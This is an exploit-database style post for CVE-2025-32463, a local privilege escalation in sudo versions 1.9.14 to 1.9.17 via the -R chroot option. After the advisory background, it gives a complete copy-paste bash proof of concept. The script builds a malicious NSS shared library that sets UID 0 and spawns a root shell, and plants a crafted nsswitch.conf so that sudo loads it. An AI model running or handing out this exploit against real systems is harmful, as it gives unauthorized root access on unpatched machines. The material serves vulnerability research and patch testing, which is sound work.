Sudo chroot 1.9.17 - Local Privilege Escalation

Exploit Title: Sudo chroot 1.9.17 - Local Privilege Escalation
Google Dork: not aplicable
Date: Mon, 30 Jun 2025
Exploit Author: Stratascale
Vendor Homepage:https://salsa.debian.org/sudo-team/sudo
Software Link:
Version: Sudo versions 1.9.14 to 1.9.17 inclusive
Tested on: Kali Rolling 2025-7-3
CVE : CVE-2025-32463

*Version running today in Kali:*
https://pkg.kali.org/news/640802/sudo-1916p2-2-imported-into-kali-rolling/

*Background*

An attacker can leverage sudo's -R (--chroot) option to run
arbitrary commands as root, even if they are not listed in the
sudoers file.

Sudo versions affected:

    Sudo versions 1.9.14 to 1.9.17 inclusive are affected.

CVE ID:

    This vulnerability has been assigned CVE-2025-32463 in the
    Common Vulnerabilities and Exposures database.

Details:

    Sudo's -R (--chroot) option is intended to allow the user to
    run a command with a user-selected root directory if the sudoers
    file allows it.  A change was made in sudo 1.9.14 to resolve
    paths via chroot() using the user-specified root directory while
    the sudoers file was still being evaluated.  It is possible for
    an attacker to trick sudo into loading an arbitrary shared
    library by creating an /etc/nsswitch.conf file under the
    user-specified root directory.

    The change from sudo 1.9.14 has been reverted in sudo 1.9.17p1
    and the chroot feature has been marked as deprecated.  It will
    be removed entirely in a future sudo release.  Because of the
    way sudo resolves commands, supporting a user-specified chroot
    directory is error-prone and this feature does not appear to
    be widely used.

    A more detailed description of the bug and its effects can be
    found in the Stratascale advisory:
    https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot

Impact:

    On systems that support /etc/nsswitch.conf a user may be able
    to run arbitrary commands as root.

*Exploit:*

*Verify the sudo version running: sudo --versionIf is vulnerable, copy and
paste the following code and run it.*
*----------------------*
#!/bin/bash
# sudo-chwoot.sh – PoC CVE-2025-32463
set -e

STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"

# 1. NSS library
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor))
void woot(void) {
    setreuid(0,0);          /* change to UID 0 */
    setregid(0,0);          /* change  to GID 0 */
    chdir("/");             /* exit from chroot */
    execl("/bin/bash","/bin/bash",NULL); /* root shell */
}
EOF

# 2. Mini chroot with toxic nsswitch.conf
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc            # make getgrnam() not fail

# 3. compile libnss_
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "[*] Running exploit…"
sudo -R woot woot                 # (-R <dir> <cmd>)
                                   # • the first “woot” is chroot
                                   # • the second “woot” is and inexistent
command
                                   #   (only needs resolve the user)

rm -rf "$STAGE"
*----------------------*